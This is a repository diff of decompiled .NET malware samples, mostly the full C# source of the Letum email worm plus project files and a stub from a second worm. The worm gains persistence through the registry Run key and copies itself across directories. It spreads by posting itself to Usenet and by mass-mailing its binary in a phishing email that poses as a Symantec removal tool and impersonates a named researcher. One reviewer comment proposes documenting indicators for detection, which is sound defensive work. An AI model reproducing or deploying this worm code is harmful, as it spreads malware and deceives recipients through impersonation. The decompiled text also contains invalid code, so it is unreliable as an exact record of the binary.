@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Properties.Settings
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Mcafee.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("9c6ecbe9-0863-4001-8a94-b8cc1b696c55")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Letum")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Letum")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Letum</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Letum</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Letum22\Letum.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Letum", "Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.csproj", "{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EF7DC6F6-67FF-4B75-94D1-25B1EF778C49}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Form1
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace Letum
{
public class Form1 : Form
{
private IContainer components;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}
@@ -0,0 +1,259 @@
// Decompiled with JetBrains decompiler
// Type: Letum22.Letum
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Letum22
{
public class Letum
{
private static Module self;
private static string pferrie = "peter_ferrie@symantec.com";
private static string[] nSubject = new string[7]
{
"Warning!",
"Virus Alert",
"Customer Support",
"Re:",
"Re:Warning",
nameof (Letum),
"Virus Report"
};
private static string[] nData = new string[3]
{
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
};
private static ArrayList List = new ArrayList();
[STAThread]
private static void Main()
{
Random random = new Random();
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
Letum.CollectDirs("C:\\", Letum.List);
int index = random.Next(0, Letum.List.Count);
string str = Letum.List[index].ToString();
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
if (registryKey1 == null)
{
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
}
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
registryKey2.Close();
thread1.Start();
thread2.Start();
if (random.Next(0, 1983) != random.Next(0, 1983))
return;
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
private static void nntp()
{
TcpClient tcpClient = new TcpClient();
ArrayList arrayList = new ArrayList();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
int startIndex1 = 0;
object obj1 = (object) null;
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
foreach (string valueName in registryKey.GetValueNames())
{
if (valueName == "NNTP Server")
obj1 = registryKey.GetValue("NNTP Server");
}
}
if (obj1 == null)
;
try
{
tcpClient.Connect("news.microsoft.com", 119);
}
catch
{
return;
}
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) stream);
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ReadLine().Substring(0, 3) != "200")
{
streamWriter.WriteLine("LIST");
string text = streamReader.ReadLine();
int num = (int) MessageBox.Show(text);
while (text != ".")
{
text = streamReader.ReadLine();
if (text != ".")
{
text = text.Substring(0, text.IndexOf(" "));
arrayList.Add((object) text);
}
}
int index = random.Next(0, arrayList.Count);
object obj2 = arrayList[index];
streamWriter.WriteLine("GROUP " + obj2);
if (streamReader.ToString().Substring(0, 3) != "211")
{
streamWriter.WriteLine("POST");
if (streamReader.ToString().Substring(0, 3) != "340")
{
string str1 = Letum.nSubject[random.Next(0, Letum.nSubject.Length)];
string str2 = Letum.nData[random.Next(0, Letum.nData.Length)] + "\r\n\r\n";
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
string str3 = Encoding.ASCII.GetString(numArray);
string str4 = string.Empty;
if (str3.Length % 3 != 0)
{
string str5 = new string(' ', 3 - str3.Length % 3);
str3 += str5;
}
int length = str3.Length;
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
int count;
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
{
count = Math.Min(60, str6.Length - startIndex1);
stringBuilder.Append("M");
stringBuilder.Append(str6, startIndex1, count);
stringBuilder.Append("\r\n");
}
string str7 = stringBuilder.ToString();
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
streamWriter.WriteLine(str9);
if (streamReader.ReadLine().Substring(0, 3) != "240")
tcpClient.Close();
}
}
}
tcpClient.Close();
}
private static void smtp()
{
TcpClient tcpClient = new TcpClient();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
object hostname = (object) null;
int startIndex = 0;
string str1 = "----=_NextPart_81_27_24";
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p>&nbsp; <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p>&nbsp;<a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p>&nbsp;</td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p>&nbsp;</p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</td></tr></table><p>&nbsp;</td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\">&nbsp;</p><p align=\"left\">&nbsp; <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\">&nbsp;</p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. 
Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer&nbsp;</font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
}
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
byte[] numArray1 = new byte[fileStream1.Length];
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
fileStream1.Close();
int count;
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
{
count = Math.Min(76, base64String.Length - startIndex);
stringBuilder.Append(base64String, startIndex, count);
stringBuilder.Append("\r\n");
}
tcpClient.Connect((string) hostname, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ToString().Substring(0, 3) != "220")
{
streamWriter.WriteLine("HELO localhost\r\n");
if (streamReader.ToString().Substring(0, 3) != "250")
{
try
{
foreach (string path in Letum.List)
{
foreach (string file in Directory.GetFiles(path, "*html"))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray2 = new byte[fileStream2.Length];
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
fileStream2.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
{
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("RCPT TO: " + (object) match);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("DATA");
if (streamReader.ToString().Substring(0, 3) != "354")
{
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
if (!(streamReader.ToString().Substring(0, 3) != "250"))
{
int num1 = 0;
if (num1 < 5)
{
tcpClient.Close();
Letum.smtp();
int num2 = num1 + 1;
}
}
}
}
}
}
}
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
tcpClient.Close();
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Letum.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
}
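Review bot: The `Letum22.Letum` listing carries only the decompiler banner, so nothing at the top of the file tells an analyst which host and network artefacts `Main`, `nntp` and `smtp` leave behind; a header comment summarising them would make the sample usable for detection work without reading the whole listing. I would add, above `namespace Letum22`, a comment block listing: the marker key `HKCU\Software\Retro` and the `Letum` value written under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (both set in `Main`); the self-copy into a randomly chosen directory under `C:\`; outbound TCP 119 to `news.microsoft.com` and TCP 25 to the SMTP server read from the Internet Account Manager keys or the fallback `mail.primaryhost.org.uk`; and the fixed attachment name `test.exe` with the spoofed sender held in `pferrie`. The same comment should say that the long string concatenation inside `smtp` is a bare expression statement, which is not valid C#, so the decompiled text is a reading aid and not an exact record of what the binary sends. The Letum.c copy of `Letum22.Letum` in the later hunk has the same gap.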
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Resources
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Letum.Properties.Resources.resourceMan == null)
Letum.Properties.Resources.resourceMan = new ResourceManager("Letum.Properties.Resources", typeof (Letum.Properties.Resources).Assembly);
return Letum.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Letum.Properties.Resources.resourceCulture;
set => Letum.Properties.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Settings
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default => Settings.defaultInstance;
}
}
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("9c6ecbe9-0863-4001-8a94-b8cc1b696c55")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Letum")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Letum")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
